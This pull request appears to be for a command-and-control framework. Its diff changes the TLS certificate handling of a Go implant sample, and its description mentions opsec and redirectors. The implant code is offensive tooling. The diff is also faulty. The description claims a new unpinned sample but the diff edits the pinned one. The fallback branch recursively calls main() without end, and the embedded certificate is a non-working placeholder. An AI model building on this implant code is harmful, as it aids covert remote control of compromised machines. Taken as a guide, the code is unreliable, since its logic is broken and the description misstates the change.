### PR TITLE
Uunpinned https implant sample

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -22,3 +22,4 @@
 .lupo.chat.log
 wolfpack.json
 wolfpack_configs/*
+tls-certs

--- a/sample/lupo_implant_https_pinned.go
+++ b/sample/lupo_implant_https_pinned.go
@@ -3,6 +3,7 @@ package main
 import (
 	"bufio"
 	"crypto/tls"
+	"crypto/x509"
 	"encoding/base64"
 	"encoding/json"
 	"fmt"
@@ -33,6 +34,10 @@ type lupoImplant struct {
 
 var implant *lupoImplant
 
+var rootCert string = `
+Cert goes here
+`
+
 func main() {
 
 	// Construct implant
@@ -50,12 +55,32 @@ func main() {
 
 	// If a root certificate is specified, use it
 	config := &tls.Config{}
+	if rootCert != "" {
+		// Create new cert pool
+		rootCAs := x509.NewCertPool()
 
-	// Trust the certpool
-	config = &tls.Config{
-		InsecureSkipVerify: true,
+		// Add cert to certpool
+		rootCAs.AppendCertsFromPEM([]byte(rootCert))
+
+		// Trust the certpool
+		config = &tls.Config{
+			InsecureSkipVerify: false,
+			RootCAs:            rootCAs,
+		}
+
+	} else {
+
+		// Recurse and try again, failure is not an option
+		main()
+
+		/*
+			// Otherwise accept any ssl cert
+			config = &tls.Config{
+				InsecureSkipVerify: true,
+			}
+		*/
 	}
-	
+
 	// Create http client
 	client := &http.Client{
 		Transport: &http.Transport{


### PR DESCRIPTION
# Pull Request

## Description
Adds another sample golang implant that doesn't require TLS pinning (previously there was a bug that needed the key bundled with the implant, the original implant sample is still provided as pinning the cert CA can be useful for opsec - but really people should be using redirectors with CA signed certs if it matters that much <.<)

## Features
- Adds new golang implant sample - same as original just without cert pinning requirements.